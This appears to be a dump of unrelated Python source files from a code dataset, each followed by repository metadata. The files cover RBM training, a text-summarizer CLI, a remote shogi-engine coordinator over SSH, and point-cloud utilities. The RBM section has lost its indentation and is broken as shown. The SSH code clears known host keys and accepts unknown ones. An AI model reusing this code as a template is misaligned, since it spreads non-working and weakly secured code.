if self.hidden_type == UnitType.GAUSSIAN \
and self.estimate_hidden_sigma:
# TODO: Implement
raise NotImplementedError("gradients for gaussian hidden"
" units not yet implemented")
delta_h_sigma_data = (((h_0 - (self.h_bias / self.h_sigma)) ** 2)
- h_0 * (np.matmul(mean_h_0, self.W.T)))
delta_h_sigma_model = (((h_k - (self.h_bias / self.h_sigma)) ** 2)
- h_k * (np.matmul(mean_h_k, self.W.T)))
delta_h_sigma = delta_h_sigma_data - delta_h_sigma_model
# average over batch take the negative
delta_h_sigma = - np.mean(delta_h_sigma, axis=0)
grads.append(delta_h_sigma)
return grads
def fit(self, train_data,
k=1,
learning_rate=0.01,
num_epochs=5,
batch_size=64,
test_data=None,
show_progress=True,
weight_decay=0.0,
early_stopping=-1,
callbacks={},
**sampler_kwargs):
"""
Parameters
----------
train_data: array-like
Data to fit RBM on.
k: int, default=1
Number of sampling steps to perform. Used by CD-k, PCD-k and PT.
learning_rate: float or array, default=0.01
Learning rate used when updating the parameters.
Can also be array of same length as `self.variables`, in
            which case the learning rate at index `i` will be used to
            update ``RBM.variables[i]``.
num_epochs: int, default=5
Number of epochs to train.
batch_size: int, default=64
            Batch size to use within the epochs.
test_data: array-like, default=None
Data similar to ``train_data``, but this will only be used as
validation data, not trained on.
If specified, will compute and print the free energy / negative
log-likelihood on this dataset after each epoch.
show_progress: bool, default=True
If true, will display progress bar for each epoch.
weight_decay: float, default=0.0
If greater than 0.0, weight decay will be applied to the
parameter updates. See :func:`RBM.step` for more information.
early_stopping: int, default=-1
If ``test_data`` is given and ``early_stopping > 0``, training
            will terminate after an epoch if the free energy of the
            ``test_data`` did not improve over the last ``early_stopping``
epochs.
Returns
-------
nlls_train, nlls_test : array-like, array-like
Returns the free energy of both ``train_data`` and ``test_data``
as computed at each epoch.
"""
num_samples = train_data.shape[0]
indices = np.arange(num_samples)
np.random.shuffle(indices)
nlls_train = []
nlls = []
prev_best = None
for epoch in range(1, num_epochs + 1):
if "pre_epoch" in callbacks:
for c in callbacks["pre_epoch"]:
c(self, epoch)
# reset sampler at beginning of epoch
# Used by methods such as PCD to reset the
# initialization value.
self.reset_sampler()
# compute train & test negative log-likelihood
# TODO: compute train- and test-nll in mini-batches
# to avoid numerical problems
nll_train = float(np.mean(self.free_energy(train_data)))
nlls_train.append(nll_train)
_log.info(f"[{epoch:03d} / {num_epochs:03d}] NLL (train):"
f" {nll_train:>20.5f}")
if test_data is not None:
nll = float(np.mean(self.free_energy(test_data)))
_log.info(f"[{epoch:03d} / {num_epochs:03d}] NLL (test):"
f" {nll:>20.5f}")
nlls.append(nll)
# stop early if all `early_stopping` previous
# evaluations on `test_data` did not improve.
if early_stopping > 0:
if epoch > early_stopping and \
np.all([a >= prev_best for a in nlls[epoch - early_stopping:]]):
_log.info("Hasn't improved in {early_stopping} epochs; stopping early")
break
else:
# update `prev_best`
if prev_best is None:
prev_best = nll
elif nll < prev_best:
prev_best = nll
# iterate through dataset in batches
if show_progress:
bar = tqdm(total=num_samples)
for start in range(0, num_samples, batch_size):
# ensure we don't go out-of-bounds
end = min(start + batch_size, num_samples)
# take a gradient-step
self.step(train_data[start: end],
k=k,
lr=learning_rate,
lmbda=weight_decay,
**sampler_kwargs)
if "post_step" in callbacks:
for c in callbacks["post_step"]:
c(self, epoch, end)
# update progress
if show_progress:
bar.update(end - start)
if show_progress:
bar.close()
# shuffle indices for next epoch
np.random.shuffle(indices)
if "post_epoch" in callbacks:
for c in callbacks["post_epoch"]:
c(self, epoch)
# compute train & test negative log-likelihood of final batch
nll_train = float(np.mean(self.free_energy(train_data)))
nlls_train.append(nll_train)
_log.info(f"[{epoch:03d} / {num_epochs:03d}] NLL (train): "
f"{nll_train:>20.5f}")
if test_data is not None:
nll = float(np.mean(self.free_energy(test_data)))
_log.info(f"[{epoch:03d} / {num_epochs:03d}] NLL (test): "
f"{nll:>20.5f}")
nlls.append(nll)
return nlls_train, nlls
def dump(self, path, *attrs):
import pickle
if not attrs:
attrs = [
'num_visible',
'num_hidden',
'visible_type',
'hidden_type',
'estimate_visible_sigma',
'estimate_hidden_sigma',
'variables',
'v_bias',
'h_bias',
'W',
'v_sigma',
'h_sigma'
]
state = {}
for a in attrs:
state[a] = getattr(self, a)
with open(path, "wb") as f:
pickle.dump(state, f)
@classmethod
def load(cls, path):
import pickle
with open(path, "rb") as f:
state = pickle.load(f)
model = cls(num_visible=state['num_visible'],
num_hidden=state['num_hidden'],
visible_type=state['visible_type'],
hidden_type=state['hidden_type'],
estimate_visible_sigma=state['estimate_visible_sigma'],
estimate_hidden_sigma=state['estimate_hidden_sigma'])
for a in state:
setattr(model, a, state[a])
return model
class BernoulliRBM(RBM):
"""Restricted Boltzmann Machine (RBM) with both hidden and visible
variables assumed to be Bernoulli random variables.
"""
def __init__(self, num_visible, num_hidden):
super(BernoulliRBM, self).__init__(
num_visible,
num_hidden,
visible_type='bernoulli',
hidden_type='bernoulli'
)
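# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original file). It assumes the
# RBM constructor's default sampler is plain CD and that `np` is the module's
# numpy import; the data and hyperparameters below are arbitrary toy values.
def _demo_bernoulli_rbm():
    rng = np.random.RandomState(0)
    data = (rng.rand(256, 16) > 0.5).astype(np.float64)
    rbm = BernoulliRBM(num_visible=16, num_hidden=8)
    # two short epochs of CD-1 on the synthetic binary data
    nlls_train, _ = rbm.fit(data, k=1, learning_rate=0.05,
                            num_epochs=2, batch_size=32,
                            show_progress=False)
    # mean reconstruction probabilities for the first few examples
    recon = rbm.reconstruct(data[:4], num_samples=50)
    return nlls_train, recon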
| 36.638554 | 135 | 0.529037 | 30,210 | 0.993423 | 0 | 0 | 1,080 | 0.035515 | 0 | 0 | 9,876 | 0.324762 |
a248fa91871a4d64d360baf9357e2574f6ec13d4 | 218 | py | Python | Ports.py | bullgom/pysnn2 | dad5ae26b029afd5c5bf76fe141249b0f7b7a36c | ["MIT"] | null | null | null | Ports.py | bullgom/pysnn2 | dad5ae26b029afd5c5bf76fe141249b0f7b7a36c | ["MIT"] | null | null | null | Ports.py | bullgom/pysnn2 | dad5ae26b029afd5c5bf76fe141249b0f7b7a36c | ["MIT"] | null | null | null |
AP = "AP"
BP = "BP"
ARRIVE = "ARRIVE"
NEUROMODULATORS = "NEUROMODULATORS"
TARGET = "TARGET"
OBSERVE = "OBSERVE"
SET_FREQUENCY = "SET_FREQUENCY"
DEACTIVATE = "DEACTIVATE"
ENCODE_INFORMATION = "ENCODE_INFORMATION"
| 13.625 | 41 | 0.724771 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 97 | 0.444954 |
a2490cedb898fffcdd522f5198f098b39d8227c4 | 2,798 | py | Python | src/oolongt/cli/cli.py | schmamps/textteaser | e948ac6c0a4a4a44c7011206d7df236529d7813d | ["MIT"] | 2 | 2020-02-18T09:13:13.000Z | 2021-06-12T13:16:13.000Z | src/oolongt/cli/cli.py | schmamps/textteaser | e948ac6c0a4a4a44c7011206d7df236529d7813d | ["MIT"] | null | null | null | src/oolongt/cli/cli.py | schmamps/textteaser | e948ac6c0a4a4a44c7011206d7df236529d7813d | ["MIT"] | 1 | 2019-05-05T14:43:53.000Z | 2019-05-05T14:43:53.000Z |
"""Command line interface for OolongT"""
import argparse
import os
import sys
import typing
from textwrap import wrap as wrap_text
from ..constants import DEFAULT_LENGTH
from ..content import Document
from ..files import get_document
from ..string import simplify
from ..typings import OptionalString, StringList
DEFAULT_WRAP = 70
def get_args():
"""Parse command line arguments if invoked directly
Returns:
        object -- parsed arguments: .path, .ext, .wrap, .limit
"""
desc = 'A Python-based utility to summarize content.'
limit_help = 'length of summary ({}, {}, [default: {}])'.format(
'< 1: pct. of sentences', '>= 1: total sentences', DEFAULT_LENGTH)
ext_help = 'nominal extension of file [default: {}]'.format(
'txt if local, html if remote')
wrap_help = 'wrap at column number [default: {}]'.format(
DEFAULT_WRAP)
parser = argparse.ArgumentParser(description=desc)
parser.add_argument(
'path', help='path/URL to file')
parser.add_argument(
'-e', '--ext', help=ext_help, default=None)
parser.add_argument(
'-w', '--wrap', help=wrap_help, default=DEFAULT_WRAP)
parser.add_argument(
'-l', '--limit', help=limit_help, default=DEFAULT_LENGTH)
args = parser.parse_args()
if not args.path.startswith('http') and not os.path.exists(args.path):
sys.stderr.write('File {!r} does not exist.'.format(args.path))
sys.exit(1)
return args
def get_summary(doc: Document, limit: float, wrap: int) -> StringList:
"""Get summary of `doc` as StringList of lines
Arguments:
doc {Document} -- document
limit {float} -- length of summary
wrap {int} -- column wrap
Returns:
StringList -- lines of document
"""
sentences = doc.summarize(limit)
text = ' '.join(sentences)
return [text] if wrap < 1 else wrap_text(text, width=wrap)
def get_output_lines(
path: str,
ext: OptionalString,
limit: float,
wrap: int) -> typing.Generator[str, None, None]:
"""Generate lines of output
Arguments:
path {str} -- path to document
ext {OptionalString} -- nominal extension of file
limit {float} -- length of summary
wrap {int} -- column wrap
Returns:
typing.Generator[str, None, None] -- output lines
"""
doc = get_document(path, ext)
yield simplify(doc.title or path)
yield ''
for line in get_summary(doc, limit, wrap):
yield simplify(line)
def cli():
"""Collect arguments, pass for summary, output to console"""
args = get_args()
limit = float(args.limit)
wrap = int(args.wrap)
for line in get_output_lines(args.path, args.ext, limit, wrap):
print(line)
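# Hedged example invocation (the exact entry point depends on how the package
# is installed; the flags below are the ones defined in get_args above):
#   python -m oolongt.cli.cli article.txt --limit 5 --wrap 80
# prints the simplified title, a blank line, then a five-sentence summary
# wrapped at column 80.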
| 27.98 | 76 | 0.641172 | 0 | 0 | 613 | 0.219085 | 0 | 0 | 0 | 0 | 1,125 | 0.402073 |
a249698e484130d9327ab696efff125ba53413ba | 15,123 | py | Python | chotgun.py | hmatsuya/chotgun | 0cee1b4ae385c57cf094376dee0ad450e308aa0a | ["MIT"] | 1 | 2021-11-04T14:26:10.000Z | 2021-11-04T14:26:10.000Z | chotgun.py | hmatsuya/chotgun | 0cee1b4ae385c57cf094376dee0ad450e308aa0a | ["MIT"] | 1 | 2020-08-07T06:58:09.000Z | 2020-08-13T06:23:20.000Z | chotgun.py | hmatsuya/chotgun | 0cee1b4ae385c57cf094376dee0ad450e308aa0a | ["MIT"] | null | null | null |
import sys
import os.path
import threading
import queue
import logging
import random
import copy
from paramiko.client import SSHClient
import paramiko
import re
import time
import os
class USIEngine:
def __init__(self, name, host, engine_path,
nodes=None, multiPV=1, threads=1,
delay=0, delay2=0):
self.name = name
self.nodes=nodes
self.multiPV = multiPV
self.quit_event = threading.Event()
self.client = SSHClient()
self.client.set_missing_host_key_policy(paramiko.client.WarningPolicy)
#self.client.load_system_host_keys()
keys = self.client.get_host_keys()
keys.clear()
self.client.connect(host)
dirname = os.path.dirname(engine_path)
command = f'cd {dirname} && {engine_path}'
self.stdin, self.stdout, self.stderr = \
self.client.exec_command(command, bufsize=0)
self.queue = queue.Queue()
self.watcher_thread = threading.Thread(target=self.stream_watcher,
name='engine_watcher', args=(self.stdout,))
self.watcher_thread.start()
self.pvs = [[]] * multiPV
self.status = 'wait'
self.position = 'startpos'
self.send('usi')
self.wait_for('usiok')
self.set_option('Threads', threads)
self.set_option('USI_Ponder', 'false')
self.set_option('NetworkDelay', delay)
self.set_option('NetworkDelay2', delay2)
self.set_option('MultiPV', multiPV)
if nodes:
self.set_option('NodesLimit', nodes)
#self.send('isready')
#self.wait_for('readyok')
def stream_watcher(self, stream):
# for line in iter(stream.readline, b''):
        prog = re.compile(r'.*score cp (-?\d+) (?:multipv (\d+))? .*pv (.+)$')
#for line in iter(stream.readline, b''):
while (not self.quit_event.isSet()) and (not stream.closed):
line = stream.readline().strip()
if len(line):
logging.debug(f'{self.name} > {line}')
print(f'info string {self.name} > {line}', flush=True)
match = prog.match(line)
if match:
logging.debug(f'match: {match.group(1, 2, 3)}')
if match.group(2):
# multi PV
num = int(match.group(2)) - 1
else:
# single PV
num = 0
logging.debug(f'{self.name}: Found score of pv {num}')
self.pvs[num] = [int(match.group(1)), match.group(3)]
# bestmove
if line.startswith('bestmove'):
self.status = 'wait'
self.queue.put(line)
logging.debug(f'{self.name}: terminating the engine watcher thread')
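    # Example of an info line in the form the regex above expects
    # (illustrative; engines vary in field order):
    #   info depth 15 score cp 32 multipv 1 nodes 100000 pv 7g7f 3c3d 2g2f
    # which yields score=32, multipv=1 and pv="7g7f 3c3d 2g2f".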
def set_option(self, name, value):
self.send(f'setoption name {name} value {value}')
def __del__(self):
pass
#self.terminate()
def terminate(self):
self.stop()
self.quit_event.set()
self.send('usi')
self.watcher_thread.join(1)
self.send('quit')
self.status = 'quit'
#self.client.close()
def send(self, command):
logging.debug(f'sending {command} to {self.name}')
print(f'info string sending {command} to {self.name}', flush=True)
self.stdin.write((command + '\n').encode('utf-8'))
self.stdin.flush()
def wait_for(self, command):
logging.debug(f'{self.name}: waiting for {command}')
lines = ""
while self.client.get_transport().is_active():
line = self.queue.get()
lines += f'{line}\n'
if (line == command):
logging.debug(f'{self.name}: found {command}')
self.status = 'wait'
return lines
def wait_for_bestmove(self):
logging.debug(f'{self.name}: waiting for bestmove...')
infostr(f'{self.name}: waiting for bestmove...')
while self.client.get_transport().is_active():
line = self.queue.get()
if (line.startswith('bestmove')):
logging.debug(f'{self.name}: found bestmove')
infostr(f'{self.name}: found bestmove')
bestmove = line[9:].split()[0].strip()
self.status = 'wait'
return bestmove
def set_position(self, pos):
self.position = pos
self.send(f'position {pos}')
def clear_queue(self):
while True:
try:
line = self.queue.get_nowait()
print(f'info string {self.name}: clearing queue: {line}', flush=True)
except queue.Empty:
break
def ponder(self, command):
infostr(f'{self.name}: in ponder()')
self.go_command = command
if 'ponder' not in command:
command = command.replace('go', 'go ponder')
self.send(command)
self.status = 'ponder'
infostr(f'{self.name}: end of ponder()')
def stop(self):
infostr(f'{self.name}: in stop()')
if self.status in ['go', 'ponder']:
self.send('stop')
self.wait_for_bestmove()
self.status = 'wait'
class Chotgun:
def __init__(self, n_jobs=5):
#logging.basicConfig(level=logging.DEBUG)
logging.basicConfig(level=logging.INFO)
engine_path = '/home/hmatsuya/workspace/Shogi/test/yane1/exe/YaneuraOu-by-gcc'
engine_path = '/home/hmatsuya/cobra/exe/YaneuraOu-by-gcc'
self.n_jobs = n_jobs
self.head = None
self.status = 'wait'
self.engines = []
self.position = 'startpos'
self.go_command = None
#for i in range(n_jobs):
#self.engines.append(USIEngine(f'yane{i}', 'localhost', engine_path, multiPV=1))
with open(os.path.join(os.path.dirname(sys.argv[0]), 'hosts.txt')) as f:
i = 0
for host in f:
host = host.strip()
if host:
self.engines.append(USIEngine(f'yane{i}', host, engine_path, multiPV=1))
i += 1
self.n_jobs = i
# setup command watcher thread
logging.debug('setting up command watcher')
self.quit_event = threading.Event()
self.queue = queue.Queue()
self.watcher_thread = threading.Thread(target=self.command_watcher,
name='command_watcher', args=(sys.stdin,))
self.watcher_thread.start()
logging.debug('end of __init__()')
def start(self):
while True:
#if self.status in ['go']:
if self.head is not None:
# print the output of the head engine
#bestmove = self.engines[self.head].bestmove
bestmove = None
while True:
head_engine = self.engines[self.head]
try:
line = head_engine.queue.get_nowait()
if line:
if line.startswith('bestmove'):
bestmove = line.split()[1]
if 'ponder' in line:
ponder = line.split()[3]
print(line, flush=True)
except queue.Empty:
break
if bestmove:
if not 'moves' in self.position:
self.position += ' moves'
self.position += f' {bestmove}'
if bestmove == 'resign':
for e in self.engines:
e.stop()
# check command from stdin
try:
command = self.queue.get_nowait()
print(f'info string command received: {command}', flush=True)
if command.startswith('position'):
print('info string setting position')
self.position = command[len('position'):].strip()
logging.debug(f'position: {self.position}')
print(f'info string position set: {self.position}', flush=True)
elif command.startswith('go'):
logging.debug('go found')
print('info string processing go command', flush=True)
self.go(command)
elif command == 'usi':
logging.debug('usi command')
self.send_all('usi')
output = self.wait_for_all('usiok')
print(output, flush=True)
elif command == 'isready':
logging.debug('isready command')
self.send_all('isready')
self.wait_for_all('readyok')
print('readyok', flush=True)
elif command.split()[0] in ['usinewgame', 'setoption']:
logging.debug(f'{command} command')
print(f'info string sending command: {command}', flush=True)
self.send_all(command)
print(f'info string sent command: {command}', flush=True)
elif command.split()[0] in ['gameover']:
logging.debug(f'{command} command')
print(f'info string sending command: {command}', flush=True)
self.send_all(command)
print(f'info string sent command: {command}', flush=True)
for e in self.engines:
if e.status in ['ponder', 'go']:
e.wait_for_bestmove()
e.status = 'wait'
self.status = 'wait'
elif command == 'ponderhit':
self.ponderhit()
elif command == 'stop':
if self.head is not None:
self.engines[self.head].send('stop')
elif command == 'quit':
self.quit()
else:
logging.debug(f'unrecognized command: {command}')
print(f'info string unrecognized command: {command}')
#else:
except queue.Empty:
logging.debug('no command yet')
time.sleep(0.001)
def command_watcher(self, stream):
logging.debug(f'starting command watcher thread')
#for line in iter(stream.readline, b''):
#while (not self.quit_event.isSet()) and (not stream.closed):
while not self.quit_event.isSet():
line = stream.readline().strip()
logging.debug(f'command queueing: {line}')
if len(line):
self.queue.put(line)
logging.debug(f'terminating the command watcher thread')
def send_all(self, command):
for e in self.engines:
e.send(command)
def wait_for_all(self, command):
for e in self.engines:
output = e.wait_for(command)
return output
def go(self, command):
logging.debug('in go_cmd()')
print('info string in go()', flush=True)
if command.startswith('go ponder'):
#infostr(f'ignoring go ponder: {command}')
self.ponder_cmd(command)
return
self.status = 'go'
self.go_command = command
#self.head = None
#infostr(f'self.head: {self.head}')
# is there any instance pondering the position?
for i, e in enumerate(self.engines):
if e.status in ['go', 'ponder']:
if e.position == self.position:
print(f'info string ponder hit: {e.position}', flush=True)
#e.clear_queue()
if e.status == 'ponder':
e.status = 'go'
e.send('ponderhit')
self.head = i
infostr(f'self.head: {self.head}')
return
# no engine pondering the position
logging.debug('no ponder hit')
print('info string no ponder hit', flush=True)
self.head = 0
infostr(f'self.head: {self.head}')
for i, e in enumerate(self.engines):
#e = self.engines[self.head]
e = self.engines[i]
if e.status in ['go', 'ponder']:
e.send('stop')
e.wait_for_bestmove()
e.set_position(self.position)
e.bestmove = None
if i == self.head:
e.send(command)
e.status = 'go'
break
else:
e.send(command.replace('go', 'go ponder'))
e.status = 'ponder'
infostr('end of go()')
def ponder_cmd(self, command):
logging.debug('in ponder_cmd()')
print('info string in ponder_cmd()', flush=True)
self.status = 'ponder'
# ponder the move sent by GUI
self.head = 0
self.engines[0].stop()
self.engines[0].set_position(self.position)
self.engines[0].ponder(command)
pos, _, head_ponder = self.position.rpartition(' ')
infostr(f'pos: {pos}, _: {_}, head_ponder: {head_ponder}')
# find candidate moves
e = self.engines[1]
e.stop()
e.set_position(pos)
e.set_option('MultiPV', self.n_jobs)
e.pvs = [None] * self.n_jobs
e.send('go')
e.wait_for_bestmove()
e.set_option('MultiPV', 1)
# ponder the moves
max_value = -99999
ie = 1
for i in range(self.n_jobs):
if ie >= self.n_jobs:
break
print(f'i: {i}, ie: {ie}', flush=True)
print(f'head: {self.head}, head\'s status: {self.engines[self.head].status}', flush=True)
print(f'pv{i}: {e.pvs[i]}', flush=True)
logging.debug(f'pv{i}: {e.pvs[i]}')
if not e.pvs[i]:
break
move = e.pvs[i][1].split()[0]
if move == head_ponder:
continue
self.engines[ie].stop()
position = f'{pos} {move}'
self.engines[ie].set_position(position)
self.engines[ie].ponder(command)
ie += 1
print('info string end of ponder_cmd()', flush=True)
def ponderhit(self):
infostr('in ponderhit()')
self.head = 0
e = self.engines[0]
e.status = 'go'
self.status = 'go'
e.send('ponderhit')
def quit(self):
#engine.terminate()
for e in self.engines:
e.terminate()
self.quit_event.set()
self.watcher_thread.join(1)
#return
#sys.exit()
os._exit(1)
def __del__(self):
pass
#self.quit()
def infostr(s):
print(f'info string {s}', flush=True)
def main():
chotgun = Chotgun(n_jobs=5)
chotgun.start()
sys.exit()
if __name__ == "__main__":
main()
sys.exit()
| 35.251748 | 101 | 0.511803 | 14,741 | 0.97474 | 0 | 0 | 0 | 0 | 0 | 0 | 3,661 | 0.242082 |
a2497a32646aebe6dad4bb729f7554cf9a01a99e | 9,051 | py | Python | source/base/utils.py | phygitalism/points2surf | c8e6d47062fc068802e179a37427981c8e10b128 | ["MIT"] | 4 | 2021-11-25T19:28:16.000Z | 2022-02-27T19:13:59.000Z | source/base/utils.py | phygitalism/points2surf | c8e6d47062fc068802e179a37427981c8e10b128 | ["MIT"] | null | null | null | source/base/utils.py | phygitalism/points2surf | c8e6d47062fc068802e179a37427981c8e10b128 | ["MIT"] | 1 | 2020-09-10T01:05:03.000Z | 2020-09-10T01:05:03.000Z |
import numpy as np
import os
from source.base import utils_mp
from source.base import file_utils
def cartesian_dist(vec_x: np.array, vec_y: np.array, axis=1) -> np.ndarray:
dist = np.linalg.norm(vec_x - vec_y, axis=axis)
return dist
def batch_quat_to_rotmat(q, out=None):
"""
quaternion a + bi + cj + dk should be given in the form [a,b,c,d]
:param q:
:param out:
:return:
"""
import torch
batchsize = q.size(0)
if out is None:
out = q.new_empty(batchsize, 3, 3)
# 2 / squared quaternion 2-norm
s = 2 / torch.sum(q.pow(2), 1)
# coefficients of the Hamilton product of the quaternion with itself
h = torch.bmm(q.unsqueeze(2), q.unsqueeze(1))
out[:, 0, 0] = 1 - (h[:, 2, 2] + h[:, 3, 3]).mul(s)
out[:, 0, 1] = (h[:, 1, 2] - h[:, 3, 0]).mul(s)
out[:, 0, 2] = (h[:, 1, 3] + h[:, 2, 0]).mul(s)
out[:, 1, 0] = (h[:, 1, 2] + h[:, 3, 0]).mul(s)
out[:, 1, 1] = 1 - (h[:, 1, 1] + h[:, 3, 3]).mul(s)
out[:, 1, 2] = (h[:, 2, 3] - h[:, 1, 0]).mul(s)
out[:, 2, 0] = (h[:, 1, 3] - h[:, 2, 0]).mul(s)
out[:, 2, 1] = (h[:, 2, 3] + h[:, 1, 0]).mul(s)
out[:, 2, 2] = 1 - (h[:, 1, 1] + h[:, 2, 2]).mul(s)
return out
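# Quick sanity sketch for the routine above (illustrative, not part of the
# original file): the identity quaternion [1, 0, 0, 0] should map to the
# 3x3 identity rotation matrix.
def _check_identity_quaternion():
    import torch
    q = torch.tensor([[1.0, 0.0, 0.0, 0.0]])
    rotmat = batch_quat_to_rotmat(q)
    assert torch.allclose(rotmat, torch.eye(3).unsqueeze(0), atol=1e-6)
    return rotmat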
def is_matrix_symmetric(matrix):
return (matrix != matrix.transpose()).count_nonzero() == 0
def right_handed_to_left_handed(pts: np.ndarray):
pts_res = np.zeros_like(pts)
if pts.shape[0] > 0:
pts_res[:, 0] = pts[:, 0]
pts_res[:, 1] = -pts[:, 2]
pts_res[:, 2] = pts[:, 1]
return pts_res
def get_patch_radii(pts_patch: np.array, query_pts: np.array):
if pts_patch.shape == query_pts.shape:
patch_radius = np.linalg.norm(pts_patch - query_pts, axis=0)
else:
dist = cartesian_dist(np.repeat(np.expand_dims(query_pts, axis=0), pts_patch.shape[0], axis=0),
pts_patch, axis=1)
patch_radius = np.max(dist, axis=0)
return patch_radius
def model_space_to_patch_space_single_point(
pts_to_convert_ms: np.array, pts_patch_center_ms: np.array, patch_radius_ms):
pts_patch_space = pts_to_convert_ms - pts_patch_center_ms
pts_patch_space = pts_patch_space / patch_radius_ms
return pts_patch_space
def model_space_to_patch_space(
pts_to_convert_ms: np.array, pts_patch_center_ms: np.array, patch_radius_ms: float):
pts_patch_center_ms_repeated = \
np.repeat(np.expand_dims(pts_patch_center_ms, axis=0), pts_to_convert_ms.shape[-2], axis=-2)
pts_patch_space = pts_to_convert_ms - pts_patch_center_ms_repeated
pts_patch_space = pts_patch_space / patch_radius_ms
return pts_patch_space
def patch_space_to_model_space_single_point(
pts_to_convert_ps: np.array, pts_patch_center_ms: np.array, patch_radius_ms):
pts_model_space = pts_to_convert_ps * \
np.repeat(np.expand_dims(patch_radius_ms, axis=0), pts_to_convert_ps.shape[0], axis=0)
pts_model_space = pts_model_space + pts_patch_center_ms
return pts_model_space
def patch_space_to_model_space(
pts_to_convert_ps: np.array, pts_patch_center_ms: np.array, patch_radius_ms):
pts_model_space = pts_to_convert_ps * \
np.repeat(np.expand_dims(patch_radius_ms, axis=1), pts_to_convert_ps.shape[1], axis=1)
pts_model_space = pts_model_space + pts_patch_center_ms
return pts_model_space
def _get_pts_normals_single_file(pts_file_in, mesh_file_in,
normals_file_out, pts_normals_file_out,
samples_per_model=10000):
import trimesh.sample
import sys
import scipy.spatial as spatial
from source.base import point_cloud
# sample points on the surface and take face normal
pts = np.load(pts_file_in)
mesh = trimesh.load(mesh_file_in)
samples, face_ids = trimesh.sample.sample_surface(mesh, samples_per_model)
mesh.fix_normals()
# get the normal of the closest sample for each point in the point cloud
# otherwise KDTree construction may run out of recursions
leaf_size = 100
sys.setrecursionlimit(int(max(1000, round(samples.shape[0] / leaf_size))))
kdtree = spatial.cKDTree(samples, leaf_size)
pts_dists, sample_ids = kdtree.query(x=pts, k=1)
face_ids_for_pts = face_ids[sample_ids]
pts_normals = mesh.face_normals[face_ids_for_pts]
np.save(normals_file_out, pts_normals)
point_cloud.write_xyz(pts_normals_file_out, pts, normals=pts_normals)
def get_pts_normals(base_dir, dataset_dir, dir_in_pointcloud,
dir_in_meshes, dir_out_normals, samples_per_model=10000, num_processes=1):
dir_in_pts_abs = os.path.join(base_dir, dataset_dir, dir_in_pointcloud)
dir_in_meshes_abs = os.path.join(base_dir, dataset_dir, dir_in_meshes)
dir_out_normals_abs = os.path.join(base_dir, dataset_dir, dir_out_normals)
dir_out_pts_normals_abs = os.path.join(base_dir, dataset_dir, dir_out_normals, 'pts')
os.makedirs(dir_out_normals_abs, exist_ok=True)
os.makedirs(dir_out_pts_normals_abs, exist_ok=True)
pts_files = [f for f in os.listdir(dir_in_pts_abs)
if os.path.isfile(os.path.join(dir_in_pts_abs, f)) and f[-4:] == '.npy']
files_in_pts_abs = [os.path.join(dir_in_pts_abs, f) for f in pts_files]
files_in_meshes_abs = [os.path.join(dir_in_meshes_abs, f[:-8] + '.ply') for f in pts_files]
files_out_normals_abs = [os.path.join(dir_out_normals_abs, f) for f in pts_files]
files_out_pts_normals_abs = [os.path.join(dir_out_pts_normals_abs, f[:-8] + '.xyz') for f in pts_files]
calls = []
for fi, f in enumerate(pts_files):
# skip if result already exists and is newer than the input
if file_utils.call_necessary([files_in_pts_abs[fi], files_in_meshes_abs[fi]],
[files_out_normals_abs[fi], files_out_pts_normals_abs[fi]]):
calls.append((files_in_pts_abs[fi], files_in_meshes_abs[fi],
files_out_normals_abs[fi], files_out_pts_normals_abs[fi],
samples_per_model))
utils_mp.start_process_pool(_get_pts_normals_single_file, calls, num_processes)
def _get_dist_from_patch_planes_single_file(file_in_pts_abs, file_in_normals_abs,
file_in_pids_abs, file_in_query_abs,
file_out_dists_abs, num_query_points_per_patch):
from trimesh.points import point_plane_distance
pts = np.load(file_in_pts_abs)
normals = np.load(file_in_normals_abs)
pids = np.load(file_in_pids_abs)
query = np.load(file_in_query_abs)
patch_pts = pts[pids]
patch_normals = normals[pids]
patch_center_normal = patch_normals[:, 0]
patch_centers = np.mean(patch_pts, axis=1)
dists = np.zeros(query.shape[0])
for pi in range(pids.shape[0]):
query_points_id_start = pi * num_query_points_per_patch
query_points_id_end = (pi + 1) * num_query_points_per_patch
patch_dists = point_plane_distance(
points=query[query_points_id_start:query_points_id_end],
plane_normal=patch_center_normal[pi],
plane_origin=patch_centers[pi])
patch_dists[np.isnan(patch_dists)] = 0.0
dists[query_points_id_start:query_points_id_end] = patch_dists
np.save(file_out_dists_abs, dists)
def get_point_cloud_sub_sample(sub_sample_size, pts_ms, query_point_ms, uniform=False):
# take random subsample from point cloud
if pts_ms.shape[0] >= sub_sample_size:
# np.random.seed(42) # test if the random subset causes the irregularities
def dist_prob(): # probability decreasing with distance from query point
query_pts = np.broadcast_to(query_point_ms, pts_ms.shape)
dist = cartesian_dist(query_pts, pts_ms)
dist_normalized = dist / np.max(dist)
prob = 1.0 - 1.5 * dist_normalized # linear falloff
# prob = 1.0 - 2.0 * np.sin(dist_normalized * np.pi / 2.0) # faster falloff
prob_clipped = np.clip(prob, 0.05, 1.0) # ensure that the probability is (eps..1.0)
prob_normalized = prob_clipped / np.sum(prob_clipped)
return prob_normalized
if uniform:
# basically choice
# with replacement for better performance, shouldn't hurt with large point clouds
sub_sample_ids = np.random.randint(low=0, high=pts_ms.shape[0], size=sub_sample_size)
else:
prob = dist_prob()
sub_sample_ids = np.random.choice(pts_ms.shape[0], size=sub_sample_size, replace=False, p=prob)
pts_sub_sample_ms = pts_ms[sub_sample_ids, :]
# if not enough take shuffled point cloud and fill with zeros
else:
pts_shuffled = pts_ms[:, :3]
np.random.shuffle(pts_shuffled)
zeros_padding = np.zeros((sub_sample_size - pts_ms.shape[0], 3), dtype=np.float32)
pts_sub_sample_ms = np.concatenate((pts_shuffled, zeros_padding), axis=0)
return pts_sub_sample_ms
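# Illustrative sketch (not part of the original module): draw a
# distance-weighted subsample of a random point cloud around a query point.
def _demo_sub_sample():
    pts = np.random.rand(1000, 3).astype(np.float32)
    query = np.array([0.5, 0.5, 0.5], dtype=np.float32)
    sub = get_point_cloud_sub_sample(200, pts, query, uniform=False)
    return sub.shape  # expected: (200, 3)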
| 40.226667 | 108 | 0.667772 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 950 | 0.104961 |
